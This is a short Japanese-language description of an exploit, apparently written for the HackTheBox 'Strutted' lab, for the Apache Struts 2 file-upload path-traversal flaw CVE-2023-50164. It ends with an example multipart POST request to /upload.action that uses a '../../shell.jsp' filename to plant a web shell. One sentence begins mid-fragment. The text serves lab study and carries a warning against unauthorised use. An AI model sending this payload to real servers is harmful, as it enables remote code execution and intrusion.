
この exploit は、HackTheBox の Strutted ラボ向けに開発され、Apache Struts 2 の CVE-2023-50164 の脆弱性を悪用することを目的としています。この欠陥により、ファイルアップロードパラメータの処理における不備を介して path traversal が可能になります。この exploit は、攻撃者がどのように 悪意のあるファイルのアップロード を行い、リモートコード実行 (RCE) を達成できるかを示す目的で作成されました。
この exploit は、HackTheBox の管理された環境内での教育目的のみで開発されており、明示的な許可なく実際のシステムで使用すべきではありません。同意なしに脆弱性を悪用することは違法かつ非倫理的です。
この exploit の目的は、Apache Struts 2 の特にファイルアップロードエンドポイントにおける欠陥が、以下のように悪用される可能性があることを示すことです:
CVE-2023-50164 の脆弱性は、ファイルアップロードパラメータの不正な処理に関連しており、攻撃者が送信されたファイル名を操作して path traversal を実行できるようにします。
../) を含め、許可されていないフォルダへの悪意のあるファイルのアップロードを可能にします。/upload.action エンドポイントに対して POST メソッドを使用して悪意のあるファイルを送信し、HTTP パラメータの大文字と小文字の区別に関する欠陥を悪用します。以下は、この脆弱性を悪用するために使用できる HTTP リクエストの例です:
POST /upload.action HTTP/1.1
Host: vulnerable-server.com
Content-Type: multipart/form-data; boundary=------------------------abcdef
--------------------------abcdef
Content-Disposition: form-data; name="Upload"; filename="img.png"
Content-Type: application/octet-stream
PNG
--------------------------abcdef
Content-Disposition: form-data;
Content-Type: application/octet-stream
../../shell.jsp
--------------------------abcdef--